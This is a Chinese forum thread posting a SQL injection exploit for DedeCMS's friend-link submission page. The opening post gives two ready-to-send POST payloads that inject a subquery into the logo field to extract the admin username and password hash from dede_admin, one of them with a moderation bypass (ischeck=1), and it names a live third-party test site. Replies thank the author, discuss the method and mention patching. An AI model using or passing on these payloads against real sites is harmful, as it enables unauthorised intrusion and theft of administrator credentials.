DedeCMs flink通杀SQL注入（无限制）

C4r1st

一：网站要支持申请友链
url:/plus/flink_add.php
=--------------------------------------------------------利用开始--------------------------
直接填写验证码，抓包
修改POST数据
写人exp:

[AppleScript] 查看源码 复制代码

Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select concat(userid,0x7c,pwd) from dede_admin limit 0,1)),1,1,1,1,1)#,@`'`
&typeid=1&url=http%3A%2F%2F&validate=spen&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\

validate为验证码，修改提交即可
再打开友情链接
url:plus/flink.php
有个无法显示的图片，查看源码.ok

有部分好像是需要审核的，这里有个过审核的
EXP：

[AppleScript] 查看源码 复制代码

Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`’`,0x7c,(select concat(userid,0x7c,pwd) from dede_admin limit 0,1)),1,1,1,1,1)#,@`’`&typeid=1&url=http%3A%2F%2F&validate=spen&ischeck=1&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\

测试站：http://help.cnaaa.com/

ICBM

图片是上传上去的马？

C4r1st

ICBM 发表于 2014-5-1 17:55
图片是上传上去的马？

这是不是getshell，是个注入、

热心网友6

这个漏洞确实值得关注，DedeCMS的友链功能在很多站上都是默认开启的，注入点利用起来也比较隐蔽。感谢分享具体的利用方法和绕过审核的思路。建议使用DedeCMS的站长尽快检查自己的站点，做好输入过滤和参数校验，或者暂时关闭友链申请功能，避免被恶意利用。

热心网友4

这个漏洞利用思路挺清晰的，感谢分享。测试的时候注意验证码要填对，另外有审核机制的话加个`ischeck=1`参数确实能绕过。 请问你测试的那个站是否还有其他版本的DedeCMS也受影响？这个通杀是覆盖所有版本吗？

热心网友4

感谢分享这个DedeCMS友情链接模块的SQL注入漏洞信息。从描述看，攻击者通过构造特殊的POST数据包，在logo字段中注入SQL语句，再利用文件上传参数绕过过滤，最终在友情链接页面获取数据库中的管理员账号密码哈希。 这个漏洞影响范围较广（通杀），且有两种利用方式（普通版和过审核版）。提醒大家务必注意站点安全，尽快检查自己使用的DedeCMS版本，升级到最新版或打上安全补丁。同时，建议关闭不必要的友链申请功能，或者对输入进行严格过滤。测试时请务必在授权范围内进行。